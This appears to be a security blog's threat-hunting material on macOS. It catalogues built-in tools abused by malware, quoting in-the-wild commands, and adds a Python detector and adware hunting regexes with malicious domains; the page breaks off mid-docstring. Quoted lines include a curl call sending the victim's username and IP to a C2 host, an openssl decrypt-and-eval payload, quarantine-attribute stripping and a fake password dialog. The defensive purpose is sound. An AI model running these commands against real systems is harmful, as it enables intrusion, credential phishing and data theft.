Friday, January 17, 2025

macOS: 20 Common Tools and Techniques Used by Threat Actors & Malware


Looking back at campaigns directly targeting the macOS platform for the last several years, we have rounded up 20 of the most commonly used built-in tools (ab)used by threat actors, malware, and adware, complete with in-the-wild examples and associated MITRE behavioural indicators. We’ve also added links for each threat so that you can follow up on further details such as IoCs, hashes and researcher analyses.

chmod (/bin/chmod)

Change file modes or Access Control Lists. Malware typically uses it to set the executable bit on a payload it has just written to disk (often in a temporary directory) after retrieving it from a C2.

Common Arguments
chmod +x
chmod -R 755
chmod 777

ITW Examples
Bundlore
chmod -R 755 /var/folders/vq/04qz73bd7zb27d3b6r7rc6zr0000gq/T/x.mykHCy73
XCSSET
chmod +x "xcassets"
Shlayer
chmod 777 /tmp/ZQEifWNV2l
SearchMine.Adware
/bin/chmod +x “${tmpFile}”

Associated MITRE Techniques
The following techniques from MITRE ATT&CK are associated with this tool:

  • File and Directory Permissions Modification T1222

chown (/usr/sbin/chown)

Change file owner and group. Malware uses this utility to change the user ID and/or group ID of the files it drops. Ownership by root can lock the logged-in user out of the file, hampering removal or inspection, and it is required in some contexts: launchd refuses to load a Launch Daemon property list that is not owned by root, which is why installers such as MMInstall chown their payload to root:wheel.

Common Arguments
chown -R <user[:group]>

ITW Examples
OSX.Dummy
chown root /tmp/script.sh
MMInstall
/usr/sbin/chown -R root:wheel /Applications/MyCouponsmart
/usr/sbin/chown -R root:wheel /Users/user/Applications/SecureMacUpdates

Associated MITRE Techniques
The following techniques from MITRE ATT&CK are associated with this tool:

  • File and Directory Permissions Modification T1222

crontab (/usr/bin/crontab)

List, install and remove rules for the cron daemon. Crontab is commonly leveraged as a means to achieve persistence on macOS either in addition to or instead of installing agents and daemons via launchctl. Threat actors may also enumerate existing crontabs in order to manipulate them.

Common Arguments
crontab -l
echo '<*/num> * * * * ' | crontab -

ITW Examples
Empyre
cmd = 'crontab -l | { cat; echo "0 * * * * %s"; } | crontab -'
GravityRAT
sudo crontab -l 2>/dev/null; echo "*/2 * * * * s
Pupy RAT
cat /etc/passwd | cut -d ":" -f 1 | xargs -n1 crontab -l -u
VindInstaller
crontab -l > /tmp/file

Associated MITRE Techniques
The following techniques from MITRE ATT&CK are associated with this tool:

  • Scheduled Task/Job: Cron T1053.003

csrutil (/usr/bin/csrutil)

Report System Integrity Protection (SIP) status. Introduced together with SIP in OS X 10.11, csrutil can only change the SIP configuration from the Recovery environment; on a running system its useful function is csrutil status, which reports whether SIP is enabled. Malware and post-exploitation tools run it to learn whether SIP-protected locations (such as /System and /usr) are writable and whether kernel-level tampering is possible on the host.

Common Arguments
csrutil status

ITW Examples
Bella

if systemVersion.startswith("10.11") or systemVersion.startswith("10.12"):
    csrutil = subprocess.Popen(["csrutil status"], stdout=subprocess.PIPE, shell=True)
    (out, err) = csrutil.communicate()
    if "disabled" in out:
        send_msg(greenPlus + out, False)
        sipEnabled = False  # SIP exists but is intentionally disabled (enterprise environments likely have this config)

MacSearch
/usr/bin/csrutil
OSX.Proton.C
csrutil status

Associated MITRE Techniques
The following techniques from MITRE ATT&CK are associated with this tool:

  • System Information Discovery T1082

curl (/usr/bin/curl)

Transfer data to or from a server without user interaction. One of the most useful tools in the malware author’s toolkit, curl is used widely in threats of all kinds, from PUPs and adware to trojans, backdoors, and APT implants, in order to download payloads, exfiltrate user data, and track campaigns via unique identifiers. Monitoring for malicious use of curl is a must for all security teams.

Common Arguments
curl -k -s -L -o

ITW Examples
OSX.GMERA
req=`curl -ks "http://owpqkszz.info/link.php?${whoami}&${ip}"`
Shlayer
curl -fsL "$url" >$tmp_path
Bundlore
curl -s -L -o "${dir}/stmp.tar.gz" "${dlUrl}"
OSX.Mami
do curl -L -f -v --create-dirs -o '/Users/user/Library/Application Support/Cyclonica/Cyclonica'
XCSSET
curl --connect-timeout 10 -sk https://flixprice.com/agent/log.php

Associated MITRE Techniques
The following techniques from MITRE ATT&CK are associated with this tool:

  • Ingress Tool Transfer T1105
  • Exfiltration Over Alternative Protocol T1048
  • Command and Control (tactic) TA0011
  • Exfiltration (tactic) TA0010

dirname (/usr/bin/dirname)

Return the directory portion of a pathname. The dirname utility and its companion basename are both widely used by threat actors to construct installation paths and to locate assets relative to the executing script's own location. Given a pathname, dirname strips the last component and returns the leading directory portion (dirname /a/b/c gives /a/b), whereas basename returns only the last component (basename /a/b/c gives c). Neither consults the current working directory.

Common Arguments
dirname <path>
basename <path>

ITW Examples
XCSSET
dirname /Users/user/Library/LaunchAgents/com.apple.core.accountsd.plist

sh -c basename '/Users/user/Library/Application Scripts/com.apple.AddressBook.Shared/CoreFrameworks/com.oracle.java.sound.app'
OceanLotus
dirname /Users/user/Downloads/ALL tim nha Chi Ngoc Canada.︀doc
MMInstall
dirname /Applications/MyCouponsmart/MyCouponsmart
Shlayer
appDir="$(dirname $(dirname "$currentDir"))"

Associated MITRE Techniques
The following techniques from MITRE ATT&CK are associated with this tool:

  • File and Directory Discovery T1083

ioreg (/usr/sbin/ioreg)

Displays the I/O Kit registry. This Unix binary is widely used by many malware families to determine the device’s unique ID (for campaign tracking), usually in the form of the machine’s serial number. This may or may not be hashed with another utility (e.g., md5) before being sent to the C2. To facilitate anti-analysis and evasion, ioreg is also used by some threat actors to determine whether the device is running in a virtual environment.

Common Arguments
ioreg -c IOPlatformExpertDevice -d 2 | awk -F'"' '/IOPlatformSerialNumber/{print $(NF-1)}'

ITW Examples
OSX.CpuMeaner
ioreg -rd1 -w0 -c AppleAHCIDiskDriver | awk '/Serial Number/{gsub("\"", "", $4);print $4}'
OSX.Fruitfly
ioreg -l | grep -e 'VirtualBox' -e 'Oracle' -e 'VMware' -e 'Parallels' | wc -l
OceanLotus
ioreg -rd1 -c IOPlatformExpertDevice | awk '/IOPlatformSerialNumber/ { split($0, line, "\""); printf("%s", line[4]); }'

Associated MITRE Techniques
The following techniques from MITRE ATT&CK are associated with this tool:

  • System Information Discovery T1082

kill (shell built-in and /bin/kill), pkill (/usr/bin/pkill), killall (/usr/bin/killall)

These related commands send signals to processes: kill by PID, pkill by a pattern matched against process names, and killall by exact process name. Malware on macOS typically uses them for evasion and anti-analysis, such as killing Activity Monitor or the Terminal to prevent users inspecting processes, or killing cfprefsd so that the preferences daemon reloads plist files the adware has edited directly.

Common Arguments
killall
kill -9
pkill

ITW Examples
macOS.OSAMiner
killall Terminal
XCSSET
xargs kill -9
Bundlore
pkill cfprefsd

Associated MITRE Techniques
The following techniques from MITRE ATT&CK are associated with this tool:

  • Impair Defenses: Disable or Modify Tools T1562.001

launchctl (/bin/launchctl)

Interfaces with launchd. For the purposes of malware and threat actors, launchctl is a primary means of executing commands and programs, for stopping system or third-party services, and starting newly created persistence jobs installed as Launch Agents and Launch Daemons.

Common Arguments
launchctl load
launchctl unload
launchctl stop
launchctl start
launchctl remove

ITW Examples
OSX.CoinMiner
launchctl load /Library/LaunchDaemons/com.apple.acc.installer.v1.plist
Lazarus Family
launchctl load -w "%s/Library/LaunchAgents/%s"
FinFisher/FinSpy
/bin/launchctl load
/bin/launchctl unload
OSX.Dummy
launchctl load -w

Associated MITRE Techniques
The following techniques from MITRE ATT&CK are associated with this tool:

  • System Services: Launchctl T1569.001
  • Scheduled Task/Job: Launchd T1053.004
  • Create or Modify System Process: Launch Agent T1543.001
  • Create or Modify System Process: Launch Daemon T1543.004

mktemp (/usr/bin/mktemp)

Make a unique filename. This useful utility is widely used by malware to make random, unique file and directory names for payloads. Despite the name, mktemp does not have to be used only in the /tmp directory.

Common Arguments
mktemp -d
mktemp -t

ITW Examples
Bundlore
tmpDir="$(mktemp -d /tmp/XXXXXXXXXXXX)"
TMP_DIR=`mktemp -d -t x
Shlayer
export tmpDir="$(mktemp -d /tmp/XXXXXXXXXXXX)"

Associated MITRE Techniques
The following techniques from MITRE ATT&CK are associated with this tool:

openssl (/usr/bin/openssl)

Cryptography toolkit. Attackers use openssl to keep second-stage payloads encrypted at rest and decrypt them only at run time, usually with the -base64 option (or piped through base64) so that the ciphertext can be embedded in a script; the plaintext never touches disk in a form static detection can see. Some tools also use it to mint self-signed certificates for their C2 channel.

Common Arguments
openssl enc -aes-256-cbc -d -A -base64 -k

ITW Examples
EvilOSX
os.popen("openssl req -newkey rsa:4096 -nodes -x509 -days 365 -subj \"%s\" -sha256 "
MMInstall
/bin/sh -c /usr/sbin/ioreg -c IOPlatformExpertDevice -d 2 | awk -F'"' '/IOPlatformSerialNumber/{print $(NF-1)}' | tr -d '\n' | openssl md5
Shlayer
openssl enc -aes-256-cbc -salt -md md5 -d -A -base64 -out /tmp/ZQEifWNV2l -pass "pass:0.6effariGgninthgiL0.6"
ZShlayer
eval "$(openssl enc -base64 -d -aes-256-cbc -nosalt -pass pass:10598344576 <"$fileDir"/Resources/talon)"

Associated MITRE Techniques
The following techniques from MITRE ATT&CK are associated with this tool:

  • Deobfuscate/Decode Files or Information T1140
  • Encrypted Channel: Asymmetric Cryptography T1573.002

osacompile (/usr/bin/osacompile)

Compile AppleScripts from given files or standard input into a single output script. Input files may be plain text or other compiled scripts. Osacompile is useful to malware that wants to take advantage of AppleScript's many powerful features, such as controlling other applications, manipulating the GUI, faking user input and phishing for credentials, while shipping only compiled scripts; with -x the output is run-only, so its source cannot be read back in Script Editor.

Common Arguments
osacompile -x -e
osacompile -x -o

ITW Examples
XCSSET
osacompile -x -e global dFolder
osacompile -x -o /Users/user/Library/Application Scripts/com.apple.AddressBook.Shared/CoreFrameworks/com.apple.core.okcx.app

Associated MITRE Techniques
The following techniques from MITRE ATT&CK are associated with this tool:

  • Obfuscated Files or Information: Compile After Delivery T1027.004

osascript (/usr/bin/osascript)

Executes a given AppleScript, which may be plain text or a compiled script (.scpt). Scripts can also be specified line by line using -e switches on the command line, a technique popular among adware and browser manipulating malware. Although AppleScripts can be executed in other ways, osascript is still the most common method used by threat actors. It is also a particular favorite of various open source post-exploitation and RAT tools.

Common Arguments
osascript -e

ITW Examples
EvilOSX
osascript -e 'tell app "iTunes" to activate' -e 'tell app "iTunes" to display dialog "Error connecting to iTunes. Please verify your password"'
Pupy RAT
cmd = 'osascript -e \'tell app "Finder" to display dialog "%s"\'' % args.text
EggShell
cmd_data["args"] = " -e 'tell application \"Finder\" to sleep'"
Elite Keylogger
/usr/bin/osascript

Associated MITRE Techniques
The following techniques from MITRE ATT&CK are associated with this tool:

  • Command and Scripting Interpreter: AppleScript T1059.002

ps (/bin/ps)

Display information about running processes. The process status (ps) command is to macOS (and Linux) what Tasklist is to Windows: an adversary’s primary means of understanding the device’s current execution environment. Aside from simply enumerating running processes, ps can be used to check on a given process’ start time, elapsed time, resource usage and the login name of the user who started it (among other things).

Common Arguments
ps ax
ps -p <pid> -o etime=

ITW Examples
macOS.OSAMiner
ps ax | grep -E '360|Keeper|MacMgr|Lemon|Malware|Avast|Avira|CleanMyMac' | grep -v grep | awk '{print $1}'
OSX.Fruitfly
ps -eAo pid,thcount,ppid,nice,user,command 2>/dev/null
Pirrit
if ps -ef | grep -v grep | grep -q $frm; then
Bella
check_output('ps -p %s -o etime=' % bellaPID)

Associated MITRE Techniques
The following techniques from MITRE ATT&CK are associated with this tool:

  • Process Discovery T1057

sw_vers (/usr/bin/sw_vers)

Print operating system version information. It is common for malware to determine the macOS version of the target machine both to discover what APIs are available so that the correct payload can be installed and to ascertain what system defences or mitigations may be in place (e.g., System Integrity Protection, User Data Protections like Full Disk Access).

Common Arguments
sw_vers
sw_vers -productName
sw_vers -productVersion
sw_vers -buildVersion

ITW Examples
Bundlore
/usr/bin/sw_vers -productVersion
GravityRAT

osinfo = os.popen('sw_vers -productName').read().strip() + '-' + os.popen('sw_vers -productVersion').read().strip() + '-' + os.popen('sw_vers -buildVersion').read().strip() + ',' + platform.platform()

Lazarus/NukeSped
sw_vers -productName
sw_vers -productVersion
sw_vers -buildVersion

Associated MITRE Techniques
The following techniques from MITRE ATT&CK are associated with this tool:

  • System Information Discovery T1082

sysctl (/usr/sbin/sysctl)

Retrieve kernel state and allow apps with appropriate privileges to set kernel state. Used by malware as a means of determining whether the execution parent is within a sandbox or virtual machine. The utility can also be used to determine, among other things, the amount of installed memory on the infected device.

Common Arguments
sysctl -n hw.model

ITW Examples
Bella
sysctl -n machdep.cpu.brand_string; hostinfo | grep memory;
EvilOSX
model_key = run_command("sysctl -n hw.model")
Genieo

/usr/sbin/sysctl
hw.optional.x86_64
hw.cpu64bit_capable

OceanLotus
sysctl hw.model

Associated MITRE Techniques
The following techniques from MITRE ATT&CK are associated with this tool:

  • Virtualization/Sandbox Evasion T1497
  • System Information Discovery T1082

system_profiler (/usr/sbin/system_profiler)

Reports system hardware and software configuration. This built-in utility is a command-line version of the System Information.app (/Applications/Utilities/System Information.app) and is a mainstay of all types of malware, spyware, post-exploitation tools, adware, and PUPs. Because of its deep insight into the entire environment, it can be used for a variety of purposes relating to environment discovery, detection evasion and anti-analysis.

Common Arguments
system_profiler SPHardwareDataType
system_profiler SPUSBDataType
system_profiler SPNetworkDataType

ITW Examples
Bundlore
/usr/sbin/system_profiler -nospawn -xml SPHardwareDataType -detailLevel full
Empyre
process = subprocess.Popen("system_profiler SPHardwareDataType", stdout=subprocess.PIPE, shell=True)
FinFisher/FinSpy
system_profiler SPUSBDataType | egrep -i "Manufacturer: (parallels|vmware|virtualbox)"
SearchPageInstaller
system_profiler SPNetworkDataType | grep 'Proxy Enabled'
AMC.PUAGenieo
/usr/sbin/system_profiler SPHardwareDataType

Associated MITRE Techniques
The following techniques from MITRE ATT&CK are associated with this tool:

  • System Information Discovery T1082
  • Virtualization/Sandbox Evasion T1497

touch (/usr/bin/touch)

The touch utility sets the modification and access times of files. If any file does not exist, it is created with default permissions. This makes the utility useful to malware in two common scenarios: for creating an empty file at a given path that is later passed data, and/or for changing the timestamp on a file as a means of evasion, also known as “timestomping”.

Common Arguments
touch
touch -t

ITW Examples
OceanLotus
touch -t 1401140507 /Users/user/Library/User Photos/mount_devfs
Pirrit
touch /Applications/.UpdatesMac15

Associated MITRE Techniques
The following techniques from MITRE ATT&CK are associated with this tool:

  • Indicator Removal on Host: Timestomp T1070.006
  • Masquerading T1036

whoami (/usr/bin/whoami)

Display effective user id. Although this utility has been replaced by the more versatile id utility, it is still widely used by malware to retrieve the current user’s name. The whoami command is effectively a synonym for id -un.

Common Arguments
whoami

ITW Examples
EggShell
echo '%@' | sudo -S whoami
whoami
Lazarus
whoami
Pupy RAT
username=`whoami`
OSX.GMERA
whoami="$(remove_spec_char `whoami`)"

Associated MITRE Techniques
The following techniques from MITRE ATT&CK are associated with this tool:

  • System Owner/User Discovery T1033

xattr (/usr/bin/xattr)

Display and manipulate extended attributes. Used by malware and threat actors to bypass Gatekeeper and notarization checks on macOS: those checks only run on files that carry the com.apple.quarantine attribute, and any user who owns a file can strip that attribute (xattr -d) or clear all attributes (xattr -c) without admin rights, so a downloaded payload can be launched without ever being assessed.

Common Arguments
xattr -d com.apple.quarantine
xattr -c
xattr -cr

ITW Examples
OceanLotus
find /Users/user -name *ALL tim nha Chi Ngoc Canada* -exec xattr -d com.apple.quarantine {} + 
XCSSET
/bin/bash -c xattr -cr '/Applications/Google Chrome.app'

Associated MITRE Techniques
The following techniques from MITRE ATT&CK are associated with this tool:

  • Subvert Trust Controls: Gatekeeper Bypass T1553.001

Conclusion

Many threat actors and malware samples use the same tools on macOS, so monitoring or searching for anomalous use of these tools can help your incident response, threat hunting and blue team efforts.
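The conclusion above recommends monitoring for anomalous use of these tools. As an added example of what that looks like in practice (this is not code from the original article), the script below tokenizes process command lines, applies one rule per argument pattern catalogued above, and tags each hit with its ATT&CK ID. The sample events are constructed from the ITW snippets quoted in the article plus three benign controls. The thresholds are this example's own choices to keep noise down (chmod is flagged only when the target sits under a temporary directory; curl only when certificate checks are disabled or the output lands in a temp directory), and a real deployment would read process-exec telemetry from an EDR or the Endpoint Security framework instead of the inline list.

```python
"""Triage macOS process-execution records for the living-off-the-land
patterns catalogued above. Added example, not code from the original
article: each rule encodes one argument pattern listed for a tool and
tags it with its ATT&CK ID. SAMPLE_EVENTS is constructed from the ITW
snippets quoted in the article; real input would be process-exec
telemetry from an EDR or the Endpoint Security framework."""
import os
import re
import shlex
from dataclasses import dataclass

TEMP_DIRS = ("/tmp/", "/private/tmp/", "/var/folders/", "/private/var/folders/")
# chmod modes that grant execute: "+x" style, or an octal mode with an odd digit
EXEC_MODE = re.compile(r"^([ugoa]*\+[rwst]*x[rwst]*|[0-7]*[1357][0-7]*)$")
SHELLS = {"sh", "bash", "zsh"}


@dataclass(frozen=True)
class Hit:
    tool: str
    technique: str  # MITRE ATT&CK (sub-)technique ID
    reason: str


def _argv(cmdline):
    try:
        return shlex.split(cmdline)
    except ValueError:  # unbalanced quote in a truncated record
        return cmdline.split()


def _short_opts(args):
    """Expand bundled single-dash options so '-ks' yields {'-k', '-s'}."""
    opts = set()
    for a in args:
        if a.startswith("--"):
            opts.add(a)
        elif len(a) > 1 and a[0] == "-":
            opts.update("-" + c for c in a[1:])
    return opts


def classify(cmdline):
    """Return the Hits for one command line ([] when nothing matches)."""
    argv = _argv(cmdline)
    if not argv:
        return []
    tool, args = os.path.basename(argv[0]), argv[1:]
    if tool in SHELLS and "-c" in args:  # `sh -c <cmd>`: classify the inner command
        inner = args[args.index("-c") + 1:]
        return classify(" ".join(shlex.quote(a) for a in inner))
    opts, hits = _short_opts(args), []
    if tool == "xattr" and ("-c" in opts or ("-d" in opts and "com.apple.quarantine" in args)):
        hits.append(Hit(tool, "T1553.001", "quarantine attribute removed (Gatekeeper bypass)"))
    if tool == "chmod":
        modes = [a for a in args if EXEC_MODE.match(a)]
        paths = [a for a in args if not a.startswith("-") and a not in modes]
        if modes and any(p.startswith(TEMP_DIRS) for p in paths):
            hits.append(Hit(tool, "T1222.002", "execute bit set on a file in a temp directory"))
    if tool == "curl":
        outs = [args[i + 1] for i, a in enumerate(args) if a in ("-o", "--output") and i + 1 < len(args)]
        if "-k" in opts or "--insecure" in opts:
            hits.append(Hit(tool, "T1105", "download with TLS certificate checks disabled"))
        elif any(o.startswith(TEMP_DIRS) for o in outs):
            hits.append(Hit(tool, "T1105", "download written straight to a temp directory"))
    if tool == "openssl" and "enc" in args and "-d" in args and ("-base64" in args or "-a" in args):
        hits.append(Hit(tool, "T1140", "base64-wrapped ciphertext decrypted on the host"))
    if tool == "launchctl" and args and args[0] in ("load", "bootstrap"):
        for plist in args[1:]:
            if ("/Library/Launch" in plist and not plist.startswith("/System/")
                    and os.path.basename(plist).startswith("com.apple.")):
                kind = "T1543.004" if "LaunchDaemons" in plist else "T1543.001"
                hits.append(Hit(tool, kind, "Apple-named launch job outside /System"))
    if tool in ("kill", "pkill", "killall") and any(a in ("Terminal", "Activity Monitor") for a in args):
        hits.append(Hit(tool, "T1562.001", "analysis tool terminated"))
    if tool == "osascript" and re.search(r"display dialog.*password", cmdline, re.I):
        hits.append(Hit(tool, "T1056.002", "AppleScript dialog asking for a password"))
    if tool == "touch" and "-t" in opts:
        hits.append(Hit(tool, "T1070.006", "explicit timestamp written (timestomping)"))
    if tool == "ioreg" and re.search(r"VirtualBox|VMware|Parallels", cmdline):
        hits.append(Hit(tool, "T1497.001", "hypervisor strings looked up in the I/O Registry"))
    return hits


def scan(events):
    """Map each suspicious command line to its Hits; clean lines are dropped."""
    return {e: hits for e in events if (hits := classify(e))}


# Constructed from the ITW snippets above; the last three are benign controls.
SAMPLE_EVENTS = [
    "chmod 777 /tmp/ZQEifWNV2l",
    "/bin/bash -c xattr -cr '/Applications/Google Chrome.app'",
    'curl -ks "http://owpqkszz.info/link.php?${whoami}&${ip}"',
    "openssl enc -aes-256-cbc -salt -md md5 -d -A -base64 -out /tmp/ZQEifWNV2l -pass pass:0.6effariGgninthgiL0.6",
    "launchctl load /Library/LaunchDaemons/com.apple.acc.installer.v1.plist",
    "touch -t 1401140507 '/Users/user/Library/User Photos/mount_devfs'",
    "killall Terminal",
    "osascript -e 'tell app \"iTunes\" to display dialog \"Please verify your password\"'",
    "chmod +x xcassets",
    "ls -la /tmp",
    "curl -sS -o /Users/user/Downloads/pkg.tgz https://example.invalid/pkg.tgz",
]

if __name__ == "__main__":
    for line, hits in scan(SAMPLE_EVENTS).items():
        for h in hits:
            print(f"{h.technique:<10} {h.tool:<9} {h.reason}\n           {line}")
```

Two details matter for rules like these. `sh -c` and `bash -c` wrappers are unwrapped so that the inner command is what gets classified (the XCSSET xattr example arrives that way), and bundled short options are expanded so that `-ks` is recognised as `-k` plus `-s`. The openssl rule deliberately matches whole tokens instead, because expanding `-md` would otherwise yield a spurious `-d`.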


MacOS: Most Prevalent Adware Infections 2022


Last month, as we closed out 2021, we shared the most recent malware discoveries afflicting the Mac platform, covering spyware, targeted attacks on developers and activists, cryptocurrency theft and crypto mining. As worrisome as those are, the bulk of infections affecting Mac users in and out of enterprise settings revolve around adware.

Once little more than a minor nuisance, adware on all platforms has taken a darker turn in recent years, often emulating malware TTPs and regularly surpassing a lot of malware families in sophistication and rapid evolution. What’s driven these developments is simple: adware makes a lot of money. Adware also harvests a lot of data from infections which can be sold off to other actors.

Most importantly from a security team’s point of view, however, is that adware infections set up hidden, persistent executables, engage in the device and environmental fingerprinting, use anti-removal, anti-analysis and detection avoidance techniques, and reach out to unknown URLs to deliver custom payloads, typically without the knowledge or informed consent of the user or, in the enterprise case, the device owner.

For all these reasons, knowing how to detect an adware infection is no less important than any other malware infection. In this post, we shine a light on the most prevalent adware families affecting the Mac platform over the last 3 months and describe the typical infection patterns for each.

Cataloguing and sharing what we know in this way has two benefits. It enables defenders to improve their immediate detections responses in the short-term, and it represents a cost to threat actors in the mid-term, who are forced to invest in retooling and rethinking their approach.

1. Adload System_Service

Adload has probably been around since 2016 and is the most common family we see in live infections today. We include in this entry only those that we have not detailed before or which we saw in the last quarter of 2021 and early 2022.

The System_Service campaign remains the most active of the current variants that we observe.

These follow a determinate pattern:

Hunting Regex

~/Library/Application Support/\.[0-9]{19,}/Services/com\..*service/.*\.service
/Library/Application Support/\.[0-9]{19,}/System/com\..*system/.*\.system

Examples

~/Library/Application Support/.16951906660859967924/Services/com.SkilledUnit.service/SkilledUnit.service
/Library/Application Support/.2301650498054541179/System/com.ElementaryType.system/ElementaryType.system

A similar, older but still active pattern does not contain the System or Service terms and does away with the hidden parent folders.

Examples

~/Library/Application Support/com.AdvancedRecord/AdvancedRecord
~/Library/Application Support/com.NetDataSearch/NetDataSearch

2. Adload Go Variant (Rload/Lador)

An increasingly common pattern we are seeing throughout late 2021 involves Adload variants written in either Go (aka Rload/Lador) or Kotlin. The Go variants currently drop a payload with the following file path pattern:

Hunting Regex

Library/Application\ Support/com\.\d{19,21}\.[0-9A-Fa-f]{8}-[0-9A-Fa-f]{4}-[0-9A-Fa-f]{4}-[0-9A-Fa-f]{4}-[0-9A-Fa-f]{12}/_?\d{19,21}

Example

/Library/Application Support/com.2718493167946217159.4E41C598-9C07-4446-96A4-CE22A41B6BF1/_5214250257291383846

Note that the executable file name only contains numerals. Although the underscore prefix is present more often than not in instances we observed, there are cases of this pattern where the underscore is not present.

3. Adload Kotlin Variant

The Kotlin variant of Adload uses a different but still quite distinctive pattern:

Hunting Regex

/Library/Application\ Support/\.[0-9A-Fa-f]{8}-[0-9A-Fa-f]{4}-[0-9A-Fa-f]{4}-[0-9A-Fa-f]{4}-[0-9A-Fa-f]{12}/\.[0-9A-Fa-f]{8}-[0-9A-Fa-f]{4}-[0-9A-Fa-f]{4}-[0-9A-Fa-f]{4}-[0-9A-Fa-f]{12}

Example

~/Library/Application Support/.D41F5C34-0DD1-4F69-9583-AE4E0B2661A3/.F06095AA-5125-41A8-B956-892944655AED

The Kotlin variants also reach out to a server with the pattern:

Hunting Regex

http://m\..*\.com/ktl/uba\?ral=

The wildcard part is consistently made up of two-word names that mimic those seen in the System_Service and earlier Adload campaigns.

Examples

http://m.originalrotator.com/ktl/uba?ral=
http://m.bufferrecord.com/ktl/uba?ral=

4. Other Adload Variants

A pattern seen across a number of different variants involves the Adload installer dropping a Mach-O executable in the /tmp/ directory with a filename prefixed with the letters "php" followed by 6 alphanumeric characters (a similar pattern is used by MaxOfferDeal/Genieo, which we discuss below).

Hunting Regex

/tmp/php\w{6}

Examples

/tmp/phpO9PLui
/tmp/phpwzmOLI
/tmp/phpZOfJhD
/tmp/php6wmXLq

A much older pattern that we still see occasionally appearing in live infections has the form:

Hunting Regex

/Library/Application\ Support/com\..*Lookup.*Lookup.*
/Library/Application\ Support/com\..*SearchDaemon.*Search.*

Examples

/Library/Application Support/com.OdysseusLookupDaemon/OdysseusLookup
/Library/Application Support/com.ExpertLookupEngineDaemon/ExpertLookupEngine
/Library/Application Support/com.ApolloSearchDaemon/ApolloSearch
/Library/Application Support/com.GlobalToolboxSearchDaemon/GlobalToolboxSearch

There are other minor variants on this naming convention that will be readily recognizable once you are familiar with the above patterns. For more information on this pattern see here.

5. Bundlore, Shlayer, and ZShlayer

Bundlore has been around since at least 2014 and, after Adload, is the most prevalent family we see in live infections throughout 2021 and into the beginning of 2022.

Bundlore payloads are typically dropped by a Shlayer or ZShlayer DMG installer. Often the Shlayer or ZShlayer installer will have one of the following file patterns:

Hunting Regex

/Volumes/Player/Player\.app/Contents/MacOS/\w+
/Volumes/Install/Install\.app/Contents/MacOS/\w+

Examples

/Volumes/Player/Player.app/Contents/MacOS/overprints
/Volumes/Install/Install.app/Contents/MacOS/isolated

Note that in the case of the “Install” pattern, the “I” can appear both as upper and lowercase. We see the “Player” version more often than the “Install” one.

The first stage payload will be dropped in a random folder created in the /tmp/ directory with a corresponding name:

Hunting Regex

/tmp/.{9}/Player\.app/Contents/MacOS/\w+
/tmp/.{9}/[Ii]nstall\.app/Contents/MacOS/\w+

Examples

/tmp/0yuEUAw74/Player.app/Contents/MacOS/overprints
/tmp/zWMp9EpUT/Install.app/Contents/MacOS/isolated

Two much older DMG patterns associated with the original Shlayer DMGs, which we now see only on rare occasions, are:

Hunting Regex

/Volumes/Player/Player.command
/Volumes/install/.hidden/install.command

6. Pirrit

Pirrit is a macOS malware family that was first seen in 2016 and remained relatively active throughout 2017 but had all but disappeared until November 2021. Since then, Pirrit has seen a new burst of activity.

In common with Bundlore, Pirrit will typically drop via a user executed DMG, although the disk image name and application name tend to be as follows:

/Volumes/Install Flash Player/Install Flash Player

Pirrit's first stage payload drops in the per-user temporary directory (DARWIN_USER_TEMP_DIR, under /private/var/folders/.../T) rather than the system /tmp directory, and uses an 8 character random directory name.

Hunting Regex

/private/var/.*/tmp\..{8}

Examples

/private/var/folders/7d/7skpstwd7qnctfwpwp7225xw0000gn/T/tmp.kfiBqqFO
/private/var/folders/7d/7skpstwd7qnctfwpwp7225xw0000gn/T/tmp.jNuFmF0E

The next stage of the infection usually drops in the Application Support folder with a random name:

Hunting Regex

~/Library/Application\ Support/com\.[A-Za-z]+/[A-Za-z]+

Examples

~/Library/Application Support/com.described/described
~/Library/Application Support/com.memberd/memberd
~/Library/Application Support/com.Searchie/Searchie

A further component is written to a folder in the User’s Library folder and contains an application of the same name:

Hunting Regex

~/Library/(.*)/\1\.app/Contents/MacOS/.*

Examples

~/Library/CheckTime/CheckTime.app/Contents/MacOS/CheckTime
~/Library/SysUpdater/SysUpdater.app/Contents/MacOS/SysUpdater

This variant of Pirrit appears to be rapidly evolving. A recent sample installed this application inside the Application Support folder:

~/Library/Application Support/com.SearchZen/SearchZen.app/Contents/MacOS/SearchZen

Depending on permissions when the infection runs, Pirrit may also install some components into /var/root/.

Behaviorally, Pirrit is a good example of adware that attempts evasion techniques that only become apparent upon execution.

VM Detection/Evasion Behavior

/usr/bin/grep grep -q VirtualBox\|Oracle\|VMware\|Parallels

7. MaxOfferDeal / Genieo

Genieo is another long-standing, common macOS malware family that goes in and out of periods of activity. Late 2021 saw some new variants which we continue to track but we have seen little activity. The most prevalent one on our radar uses a persistent LaunchAgent with the following pattern for its program argument:

Example

~/Library/Application Support/.gettime/GetTime

Interestingly, the persistence file is copied from a /tmp/ file that uses a similar naming pattern to Adload, namely “php” followed by 6 characters. This may be coincidence or deliberate, and either way may have caused some vendors to identify one as the other.

The same regex we showed for Adload Mach-Os above, however, will also find these .plist files.

Examples

/tmp/phpEFab3r
/tmp/phpEkFfeu
/tmp/phpkWZyll
/tmp/phpWLcS4s
/tmp/phpWagty2
/tmp/phpHGpcfX

However, in the Adload case, these files are always Mach-Os, whereas in the MaxOfferDeal/Genieo case they are always property lists. We see no other indicators or similarities between the executable and known Adload variants.

8. MMInstall/MacUpdater

MMInstall has been around since at least early 2018 and typically installs a LaunchAgent whose program argument carries one of a variety of names like "MyShopCoupon", "CouponSmart" and similar. Older forms typically had an executable named "mm-install-macos", but we haven't seen those for some time.

Apple recently updated their XProtect malware signatures for a newer version of this adware threat that appears to have been active during the middle of 2021. The following domains are still currently active:

Hunting regex

yougotupdated.com
liveforlifetoday.com

Examples

http://tracker.yougotupdated.com
http://installer.yougotupdated.com/offers/macUpdater/updater
https://installer.yougotupdated.com/offers/macUpdater/updater
http://inst.liveforlifetoday.com/offers/macUpdater/updater

The only known installer pattern we have seen to date is as follows.

/Volumes/search/Search.app/Contents/MacOS/Search
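The hunting regexes above, collected into one scanner as an added example (this is not code from the original post). The patterns are the post's own, with the corrections needed for them to match the post's own examples: UUID hex is matched in either case (the examples use uppercase, which [0-9a-f] would miss), the Install volume and app name accept either case as the text notes, ~ also matches a concrete /Users/<name> prefix, and the Go variant's leading underscore is optional as the text says. One caveat the scanner makes visible: the Pirrit stage-2 pattern (com.<Name>/<Name> under Application Support) is shaped exactly like the older Adload examples, so that hit on its own does not attribute a family. The artifacts in the sample list are constructed from the examples above plus two benign paths.

```python
"""Hunt file paths and URLs for the adware patterns described in this post.
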